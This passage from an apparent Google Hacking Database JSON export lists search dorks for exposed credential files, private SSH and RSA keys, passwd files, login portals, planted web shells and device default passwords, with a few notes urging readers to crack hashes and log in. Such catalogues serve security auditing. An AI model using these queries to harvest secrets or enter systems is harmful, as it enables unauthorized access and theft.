symlinks of other ServersAuthor: Un0wn_X", "submited": "2013-04-09", "request": "\"index of\" inurl:sym", "id": 3837}, {"short description": "inurl:\"php?id=\" intext:\"DB_Error Object \"", "long description": "Description: Files containing juicy infoAuthor:ruben_linux", "submited": "2013-04-09", "request": "inurl:\"php?id=\" intext:\"DB_Error Object \"", "id": 3838}, {"short description": "ext:sql intext:@hotmail.com intext :password", "long description": "By ,NItish Mehta ,www.illuminativeworks.com/bloghttps://www.facebook.com/illuminativeworksIlluminative Works(CEO & Founder )", "submited": "2013-04-09", "request": "ext:sql intext:@hotmail.com intext 
:password", "id": 3839}, {"short description": "inurl:advsearch.php?module= & intext:sql syntax", "long description": "Exploit Title : SQLI ExploitGoogle Dork : inurl:advsearch.php?module= & intext:sql syntaxDate : 19/3/2013Exploit Author : Scott SturrockEmail : f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "inurl:advsearch.php?module= & intext:sql syntax", "id": 3840}, {"short description": "intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "long description": "Category : Pages containing login portalsDescription : Dork for finding sensitive login portalsDork : intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspxLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&oq=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&gs_l=hp.3...852.852.0.983.1.1.0.0.0.0.121.121.0j1.1.0...0.0...1c.1.7.psy-ab.664iAsY450k&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667Date : 20/3/2013Exploit Author: Scott SturrockEmail: f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "id": 3841}, {"short description": "intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "long description": "Category : Pages containing login portalsDescription : Dork for finding government login portalsDork : intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspxLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&oq=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&gs_l=hp.3...894.894.0.1059.1.1.0.0.0.0.116.116.0j1.1.0...0.0...1c.1.7.psy-ab.lvawmQ4rKqA&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667Date : 
20/3/2013Author : Scott SturrockEmail: f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "id": 3842}, {"short description": "intext:Computer Misuse Act inurl:login.aspx", "long description": "Category : Pages containing login portalsDescription : Dork for finding sensitive login portalsDork : intext:Computer Misuse Act inurl:login.aspxLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&oq=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&gs_l=hp.3...1565.1565.0.1684.1.1.0.0.0.0.105.105.0j1.1.0...0.0...1c.1.7.psy-ab.ZaZN16Ureds&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.ZWU&fp=7b93b16efbccc178&biw=1362&bih=667Date : 20/3/2013Author : Scott SturrockEmail: f00bar'at'linuxmail'dot'org", "submited": "2013-04-09", "request": "intext:Computer Misuse Act inurl:login.aspx", "id": 3843}, {"short description": "filetype:ini \"This is the default settings file for new PHP installations\"", "long description": "Finds PHP configuration files (php.ini) that have been placed in indexedfolders. Php.ini defines a PHP installation's behavior, including magicquotes, register globals, and remote file operations. This can be usefulfor knowing which attacks (such as RFI) are possible against the server.- Andy G - twitter.com/vxhex", "submited": "2013-04-22", "request": "filetype:ini \"This is the default settings file for new PHP installations\"", "id": 3844}, {"short description": "filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "long description": "Tries to reduce false positive results from similar dorks. Finds pagescontaining output from phpinfo(). This function is used to debug and testPHP installations by listing versions, extensions, configurations, serverinformation, file system information, and execution environment. 
The outputof this function should not be included in production environments andcertain versions of this function are vulnerable to reflected XSS attacks.- Andy G - twitter.com/vxhex", "submited": "2013-04-22", "request": "filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "id": 3845}, {"short description": "inurl:/voice/advanced/ intitle:Linksys SPA configuration", "long description": "This allows you to look at linksys VOIP Router Config pages.", "submited": "2013-04-22", "request": "inurl:/voice/advanced/ intitle:Linksys SPA configuration", "id": 3846}, {"short description": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "long description": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "submited": "2013-04-22", "request": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "id": 3847}, {"short description": "intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "long description": "Author: ./tic0 | Izzudin al-Qassam Cyber Fighter", "submited": "2013-04-22", "request": "intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "id": 3848}, {"short description": "filetype:sql insite:pass && user", "long description": "Google Dork: filetype:sql insite:pass && userWe Can get login username and password details from .sql file.Author: BlacK_WooD", "submited": "2013-04-22", "request": "filetype:sql insite:pass && user", "id": 3849}, {"short description": "Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.", "long description": "# Category: FTP Login Portals# Description : Dork for finding FTP Login portals# Google Dork: Serv-U Copyright 1995-2013 Rhino Software, Inc. AllRights.Reserved.# Date: 16/04/2013# Exploit Author: Arul Kumar.V# Vendor Homepage: www.serv-u.com# Email : hackerarul@gmail.comThank you", "submited": "2013-04-22", "request": "Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. 
All Rights.Reserved.", "id": 3850}, {"short description": "intext:(see in orig)", "long description": "Google search:intext:(see in orig)DORK:(see in orig)Description:Unrestricted File Upload(Allow User To Upload malicious Files)Author:Bhavya ShuklaTwitter:@bhavya_shukla_", "submited": "2013-04-22", "request": "intext:(see in orig)", "id": 3851}, {"short description": "allintext: /iissamples/default/", "long description": "Searching for \"allintext: /iissamples/default/\" may provide interestinginformation about a mis-configured .asp server including raw source codefor asp, directory structure and the IIS version ( especially useful whenIIS is running on NT 4.0)the result provides a way to further explore directory structure for juicyinfo.Oleg.", "submited": "2013-04-23", "request": "allintext: /iissamples/default/", "id": 3852}, {"short description": "intitle:\"VNC Viewer for Java\"", "long description": "VNC Viewer for Java~4N6 Security~", "submited": "2013-08-08", "request": "intitle:\"VNC Viewer for Java\"", "id": 3853}, {"short description": "inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "long description": "zendesk is good ticketing system . It has thousands of clients. 
with theabove dork you can see the clients internal file attachments of thetickets .These file can be opened by anyone because they are not maintaining anyauthentication token for this attachmentsInternal source codes, doubts, ip's , passwords, can be disclosed in theattachments", "submited": "2013-08-08", "request": "inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "id": 3854}, {"short description": "inurl:\"dasdec/dasdec.csp\"", "long description": "inurl:\"dasdec/dasdec.csp\"DASDEC II Emergency Alert SystemUser Manual: http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdfDefault username: AdminDefault password: dasdec", "submited": "2013-08-08", "request": "inurl:\"dasdec/dasdec.csp\"", "id": 3855}, {"short description": "\"information_schema\" filetype:sql", "long description": "Dork: \"information_schema\" filetype:sqlBy: Cr4t3r", "submited": "2013-08-08", "request": "\"information_schema\" filetype:sql", "id": 3856}, {"short description": "intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "long description": "# Exploit Title: google dork for apache directory listing by url edit# Google Dork: intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1in this query you see that text file but by url we can travel in paren directory# Date: 11/7/2013# Exploit Author: james love india# Tested on: windows xp sp2", "submited": "2013-08-08", "request": "intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "id": 3857}, {"short description": "intitle:index.of intext:.bash_history", "long description": "the GHDB on subject (intitle:index.of intext:.bash_history) finds allhome users directory path indexed. 
I've test it and google return 943results!-Andrea Menin", "submited": "2013-08-08", "request": "intitle:index.of intext:.bash_history", "id": 3858}, {"short description": "intitle:\"Cisco Integrated Management Controller Login\"", "long description": "intitle:\"Cisco Integrated Management Controller Login\"The Cisco Integrated Management Controller (CIMC) is the management servicefor the C-Series servers. CIMC is built into the motherboard. This Googledork searches for the CIMC GUI login portal for remote access.ax_", "submited": "2013-08-08", "request": "intitle:\"Cisco Integrated Management Controller Login\"", "id": 3859}, {"short description": "inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "long description": "Finds login pages and system dashboards for Atlassian's JIRA.- Andy G - twitter.com/vxhex", "submited": "2013-08-08", "request": "inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "id": 3860}, {"short description": "\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "long description": "Finds cPanel login pages.- Andy G - twitter.com/vxhex", "submited": "2013-08-08", "request": "\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "id": 3861}, {"short description": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "long description": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadminview phpMyAdmin of web sitesAuthor: Un0wn_XFollow: @UnownSecE-Mail: unownsec@gmail.com", "submited": "2013-08-08", "request": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "id": 3862}, {"short description": "inurl:fluidgalleries/dat/login.dat", "long description": "Works with every single fluidgalleries portofolio sites. Just decrypt the MD5 hash and login onto url.extension/admin.php with the username from the search result and with the decrypted MD5 hash. 
Dork by Kraze (kraze@programmer.net)", "submited": "2013-08-08", "request": "inurl:fluidgalleries/dat/login.dat", "id": 3863}, {"short description": "inurl:5000/webman/index.cgi", "long description": "Synology nas login", "submited": "2013-08-08", "request": "inurl:5000/webman/index.cgi", "id": 3864}, {"short description": "inurl:wp-content/uploads/dump.sql", "long description": "This is *Mohan Pendyala* (penetration tester) from india.Google Dork: *inurl:wp-content/uploads/dump.sql***The *Dump.sql* file reveals total info about the database tables, Users,passwords..etc", "submited": "2013-08-08", "request": "inurl:wp-content/uploads/dump.sql", "id": 3865}, {"short description": "intitle:\"Internet Security Appliance\" & intext:\"Enter Password and click Login\"", "long description": "#Summary: ZyWall Firewall login portal#Category: Various Online Devices#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Internet Security Appliance\" & intext:\"Enter Password and click Login\"", "id": 3866}, {"short description": "inurl:1337w0rm.php intitle:1337w0rm", "long description": "Finds websites that have 1337w0rm's CPanel cracker uploaded.Since the Cracker is relatively new, some sites might not use it.-TehMysticaL", "submited": "2013-08-08", "request": "inurl:1337w0rm.php intitle:1337w0rm", "id": 3867}, {"short description": "intitle:\".:: Welcome to the Web-Based Configurator::.\" & intext:\"Welcome to your router Configuration Interface\"", "long description": "#Summary: ZyXEL router login portal#Category: Pages containing login portals#Author: g00gl3 5c0u7NOTE:currently exists this -> http://www.exploit-db.com/ghdb/270/ but only shows8 results against 63100 that i sent, also covers more models.", "submited": "2013-08-08", "request": "intitle:\".:: Welcome to the Web-Based Configurator::.\" & intext:\"Welcome to your router Configuration Interface\"", "id": 3868}, {"short description": "intext:\"I'm using a public or shared computer\" & 
intext:\"Remote Web Workplace\"", "long description": "#Summary: Windows Business Server 2003 Login portal#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intext:\"I'm using a public or shared computer\" & intext:\"Remote Web Workplace\"", "id": 3869}, {"short description": "inurl:\"/secure/login.aspx\"", "long description": "#Summary: Several Web Pages Login Portal#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:\"/secure/login.aspx\"", "id": 3870}, {"short description": "intitle:\"Weather Wing WS-2\"", "long description": "#Summary:Weather Wing (http://www.meteo-system.com/ws2.php) Portal.#Category: Various Online Divices#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Weather Wing WS-2\"", "id": 3871}, {"short description": "intitle:\"NetBotz Network Monitoring Appliance\"", "long description": "#Summary:Various Online Divices#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"NetBotz Network Monitoring Appliance\"", "id": 3872}, {"short description": "intitle:\"Transponder/EOL Configuration:\" inurl:asp", "long description": "#Summary: Cheeta Technologies Transponder Configuration Portal (*http://www.cheetahtech.com).*#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Transponder/EOL Configuration:\" inurl:asp", "id": 3873}, {"short description": "intitle:\"WAMPSERVER Homepage\" & intext:\"Server Configuration\"", "long description": "#Summary: Wampserver Homepage free access (*http://www.wampserver.com/).*#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"WAMPSERVER Homepage\" & intext:\"Server Configuration\"", "id": 3874}, {"short description": "intitle:\"Web Image Monitor\" & inurl:\"/mainFrame.cgi\"", "long description": "#Summary: Several printers that use \"Web Image Monitor\" control panel 
(http://ricoh.pbworks.com/w/page/14063393/CSWebImageMonitor). Used defaultby Ricoh, Lanier and others.#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Web Image Monitor\" & inurl:\"/mainFrame.cgi\"", "id": 3875}, {"short description": "inurl:8080 intitle:\"Dashboard [Jenkins]\"", "long description": "#Summary: Acces to Jenkins Dashboard#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:8080 intitle:\"Dashboard [Jenkins]\"", "id": 3876}, {"short description": "intitle:\"Login - OTRS\" inurl:pl", "long description": "#Summary: OTRS login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"Login - OTRS\" inurl:pl", "id": 3877}, {"short description": "intitle:\"WebMail | Powered by Winmail Server - Login\" & (intext:\"Username\" & intext:\"Password\")", "long description": "#Summary: Winmail login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"WebMail | Powered by Winmail Server - Login\" & (intext:\"Username\" & intext:\"Password\")", "id": 3878}, {"short description": "inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "long description": "#Summary: VoIP login portals#Category: Pages containing login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "id": 3879}, {"short description": "intitle:\"::: Login :::\" & intext:\"Customer Login\" & \"Any time & Any where\"", "long description": "#Summary: Surveillance login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "intitle:\"::: Login :::\" & intext:\"Customer Login\" & \"Any time & Any where\"", "id": 3880}, {"short description": "inurl:phpmyadmin/index.php & (intext:username & password & \"Welcome to\")", "long description": "#Summary: PHP Admin login portals#Author: g00gl3 5c0u7", "submited": "2013-08-08", "request": "inurl:phpmyadmin/index.php & (intext:username & password & \"Welcome to\")", "id": 
3881}, {"short description": "inurl:~~joomla3.txt filetype:txt", "long description": "By this dork you can find juicy information joomla configuration filesAuthor: Un0wn_X", "submited": "2013-08-08", "request": "inurl:~~joomla3.txt filetype:txt", "id": 3882}, {"short description": "filetype:txt inurl:wp-config.txt", "long description": "Easily hunt the Wordpress configuration file in of remote web sitesAuthor : Un0wn_X", "submited": "2013-08-08", "request": "filetype:txt inurl:wp-config.txt", "id": 3883}, {"short description": "filetype:txt inurl:~~Wordpress2.txt", "long description": "This dork can be used to find symlinked Wordpress configuration files ofother web sites", "submited": "2013-08-08", "request": "filetype:txt inurl:~~Wordpress2.txt", "id": 3884}, {"short description": "-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "long description": "Dork:-site:simplemachines.org \"These are the paths and URLs to your SMFinstallation\"Details:This google dork finds sites with the Simple Machines repair_settings.phpfile uploaded to the root directory. 
This gives unauthenticated access tothe SQL username and password for the forum.", "submited": "2013-09-24", "request": "-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "id": 3885}, {"short description": "intitle:\"index of\" myshare", "long description": "Google search for shared HDD directories or shared directories on servers.Gives access to often unconsciously shared documents, programs orsensitive information.Also are often other directories on these drives accessible.Dork by :redN00ws", "submited": "2013-09-24", "request": "intitle:\"index of\" myshare", "id": 3886}, {"short description": "intitle:\"SPA504G Configuration\"", "long description": "Dork : intitle:\"SPA504G Configuration\"Result : Gives access to Cisco SPA504G Configuration Utility for IP phonesScreenshot Google DorkDork found by :redN00ws", "submited": "2013-09-24", "request": "intitle:\"SPA504G Configuration\"", "id": 3887}, {"short description": "\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "long description": "To find private RSA Private SSL Keys", "submited": "2013-09-24", "request": "\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "id": 3888}, {"short description": "inurl:\"/cgi-mod/index.cgi\"", "long description": "Returns login pages for various Barracuda Networks branded hardware spamfilters and mail archivers.4N6 Security", "submited": "2013-09-24", "request": "inurl:\"/cgi-mod/index.cgi\"", "id": 3889}, {"short description": "intitle:\"RouterOS router configuration page\"", "long description": "Returns login portals for Microtik routers running RouterOS version 5and up.4N6 Security", "submited": "2013-09-24", "request": "intitle:\"RouterOS router configuration page\"", "id": 3890}, {"short description": "inurl:\"/webcm?getpage=\"", "long description": "Returns various Actiontec (and often Qwest) branded routers' login pages.4N6 Security", "submited": "2013-09-24", "request": "inurl:\"/webcm?getpage=\"", "id": 3891}, {"short description": 
"intitle:\"Web Client for EDVS\"", "long description": "Yet another DVR system. Probably requires Java to display.4N6 Security", "submited": "2013-09-24", "request": "intitle:\"Web Client for EDVS\"", "id": 3892}, {"short description": "intitle:index.of intext:.ssh", "long description": "Find peoples ssh public and private keys- tmc / #havok", "submited": "2013-09-24", "request": "intitle:index.of intext:.ssh", "id": 3893}, {"short description": "inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "long description": "With this search you can view results for mikrotik graphics interfaces*Obrigado,*", "submited": "2013-09-24", "request": "inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "id": 3894}, {"short description": "inurl:*/webalizer/* intitle:\"Usage Statistics\"", "long description": "*Obrigado,*", "submited": "2013-09-24", "request": "inurl:*/webalizer/* intitle:\"Usage Statistics\"", "id": 3895}, {"short description": "intitle:\"Comrex ACCESS Rack\"", "long description": "IP Codecs offering \"studio quality audio and video over wired andwireless IP circuits\". Used in studio-grade radio broadcasting over theweb. More product information here: http://www.comrex.com/products.html.This Google search will return (some, but not hundreds of) web-facinglogin portals for this type of device. Requires JavaScript and Flash forviewer to work. 
Default login: comrex comrex.4N6 Security", "submited": "2013-09-24", "request": "intitle:\"Comrex ACCESS Rack\"", "id": 3896}, {"short description": "site:github.com inurl:sftp-config.json intext:/wp-content/", "long description": "Finds disclosed ftp FTP for Wordpress installs, which have been pushed to a public repo on GitHub.Credit: RogueCoder", "submited": "2013-11-25", "request": "site:github.com inurl:sftp-config.json intext:/wp-content/", "id": 3897}, {"short description": "site:github.com inurl:sftp-config.json", "long description": "Find disclosed FTP login credentials in github repositoriesCredit: RogueCoder", "submited": "2013-11-25", "request": "site:github.com inurl:sftp-config.json", "id": 3898}, {"short description": "inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "long description": "Find FTP logins and full path disclosures pushed to githubinurl:github.com intext:sftp-conf.json +intext:/wp-content/--RogueCoder", "submited": "2013-11-25", "request": "inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "id": 3899}, {"short description": "allinurl:\"owa/auth/logon.aspx\" -google -github", "long description": "[+] Description - Find OWA login portalsRegards,necrodamushttp://www.twitter.com/necrodamus2600", "submited": "2013-11-25", "request": "allinurl:\"owa/auth/logon.aspx\" -google -github", "id": 3900}, {"short description": "ext:sql intext:@gmail.com intext:password", "long description": "author:haji", "submited": "2013-11-25", "request": "ext:sql intext:@gmail.com intext:password", "id": 3901}, {"short description": "inurl:\"struts\" filetype:action", "long description": "Google search for actoin files wich could be explotable via CVE-2013-2251\"Multiple Remote Command Execution Vulnerabilities in Apache Struts\"", "submited": "2013-11-25", "request": "inurl:\"struts\" filetype:action", "id": 3902}, {"short description": "filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "long description": "Project 
Honey Pot anti-spammer detection (http://www.projecthoneypot.org/)Can identify the honeypot and get the site's honeypot keys---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "id": 3903}, {"short description": "inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "long description": "Git config fileEasy way to find Git Repositories---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "id": 3904}, {"short description": "intitle:\"IPCam Client\"", "long description": "Foscam IPCamBy default these cameras attach to the myfoscam.org DDNS. So you could addsite:myfoscam.org. On the otherhand if you're hunting for DDNS servers, youcould negate that site and examine the other results.---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "intitle:\"IPCam Client\"", "id": 3905}, {"short description": "inurl:/wp-content/uploads/ filetype:sql", "long description": "Google dork for WordPress database backup file (sql):inurl:/wp-content/uploads/ filetype:sqlBy sm0k3 (http://sm0k3.net - Sm0k3 HQ)_________________With regards,sm0k3Any questions: info@sm0k3.netAdministration issues: admin@sm0k3.netWant to submit an order: submit@sm0k3.netJabber: sm0k3@im.sm0k3.netBlog: http://sm0k3.net", "submited": "2013-11-25", "request": "inurl:/wp-content/uploads/ filetype:sql", "id": 3906}, {"short description": "site:github.com inurl:\"known_hosts\" \"ssh-rsa\"", "long description": "Finds SSH known_hosts files on GitHub.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "site:github.com inurl:\"known_hosts\" 
\"ssh-rsa\"", "id": 3907}, {"short description": "site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "long description": "Finds private SSH keys on GitHub.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "id": 3908}, {"short description": "inurl:\"/module.php/core/loginuserpass.php\"", "long description": "Finds SimpleSAMLphp login pages.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "inurl:\"/module.php/core/loginuserpass.php\"", "id": 3909}, {"short description": "inurl:\"/jenkins/login\" \"Page generated\"", "long description": "Finds login pages for Jenkins continuous integration servers.- Andy G - twitter.com/vxhex", "submited": "2013-11-25", "request": "inurl:\"/jenkins/login\" \"Page generated\"", "id": 3910}, {"short description": "\"inurl:/data/nanoadmin.php\"", "long description": "Hi,I would like to submit this GHDB which allow to find out nanoCMSadministration pages :*inurl:\"/data/nanoadmin.php\"*Best regards,Antonino Napoli", "submited": "2013-11-25", "request": "\"inurl:/data/nanoadmin.php\"", "id": 3911}, {"short description": "intitle:\"uploader by ghost-dz\" ext:php", "long description": "intitle:\"uploader by ghost-dz\" ext:php", "submited": "2013-11-25", "request": "intitle:\"uploader by ghost-dz\" ext:php", "id": 3912}, {"short description": "filetype:bak (inurl:php | inurl:asp | inurl:rb)", "long description": "This one could be used to find all sorts of backup data, but this exampleis limited to just common webapp extensions---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:bak (inurl:php | inurl:asp | inurl:rb)", "id": 3913}, {"short description": "intitle:\"index of\" intext:\".ds_store\"", "long description": "Mac OSX directories---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ 
https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "intitle:\"index of\" intext:\".ds_store\"", "id": 3914}, {"short description": "inurl:tar filetype:gz", "long description": "Tar filesContain user and group information (in addition to potentially useful files)---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "inurl:tar filetype:gz", "id": 3915}, {"short description": "intitle:\"RT at a glance\" intext:\"quick search\"", "long description": "RT Request Tracker Ticket Databasehttp://www.bestpractical.com/rt/---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "intitle:\"RT at a glance\" intext:\"quick search\"", "id": 3916}, {"short description": "inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "long description": "JBosshttp://docs.jboss.org/jbossas/docs/Server_Configuration_Guide/4/html/Connecting_to_the_JMX_Server-Inspecting_the_Server___the_JMX_Console_Web_Application.html---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "id": 3917}, {"short description": "filetype:php intext:\"!C99Shell v. 1.0 beta\"", "long description": "php backdoor: c99 shell---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:php intext:\"!C99Shell v. 
1.0 beta\"", "id": 3918}, {"short description": "filetype:xml inurl:sitemap", "long description": "Sitemaps, the opposite of Web Robots ExclusionDetail directory and page map---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:xml inurl:sitemap", "id": 3919}, {"short description": "filetype:jnlp", "long description": "Java Web Start (Java Network Launch Protocol)---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:jnlp", "id": 3920}, {"short description": "filetype:password jmxremote", "long description": "Passwords for Java Management Extensions (JMX Remote)Used by jconsole, Eclipse's MAT, Java Visual VM, JmxClihttp://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html---[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+ https://plus.google.com/u/0/114827336297709201563", "submited": "2013-11-25", "request": "filetype:password jmxremote", "id": 3921}, {"short description": "inurl:mikrotik filetype:backup", "long description": "mikrotik url backups uploaded..then.. credentials cracked via http://mikrotikpasswordrecovery.comBest Regards,kn0wl13dg3 - underc0de team.- www.underc0de.orgkn0w13dg3.blogspot.com", "submited": "2013-11-27", "request": "inurl:mikrotik filetype:backup", "id": 3922}, {"short description": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "long description": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -githubHow This Work?This dork will searches databases phpMyAdmin. Searches only sql formats and founds admin username and passwords to use this information to login as administratorSorry for my english. 
I'm not a native speaker", "submited": "2013-11-27", "request": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "id": 3923}, {"short description": "inurl:/administrator/index.php?autologin=1", "long description": "Title: google hacking username and password of joomlaGoogle Dork: inurl:/administrator/index.php?autologin=1Date: 2013-11-30Author: Ashiyane Digital Security TeamSoftware Link: www.joomla.org/Version: joomla 2.5Location: /administrator/index.php?autologin=1&passwd=[password]&username=[username]", "submited": "2013-12-03", "request": "inurl:/administrator/index.php?autologin=1", "id": 3924}, {"short description": "allinurl:\"/main/auth/profile.php\" -github -google", "long description": "[+] This dork will help you find Chamilo login portals. Depending on theversion, the site could be vulnerable to SQL injection.See Here-http://www.exploit-db.com/exploits/30012/Regards,necrodamushttp://www.twitter.com/necrodamus2600", "submited": "2014-01-03", "request": "allinurl:\"/main/auth/profile.php\" -github -google", "id": 3925}, {"short description": "intitle:\"=[ 1n73ct10n privat shell ]=\"", "long description": "the dork is used to find uploaded 1n73ct10n Shell on website.found by Anon?M ID", "submited": "2014-01-03", "request": "intitle:\"=[ 1n73ct10n privat shell ]=\"", "id": 3926}, {"short description": "intitle:\"WSO 2.4\" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "long description": "dork to find uploaded WSO 2.4 shell by hackers.found by Anon?M ID", "submited": "2014-01-03", "request": "intitle:\"WSO 2.4\" [ Sec. 
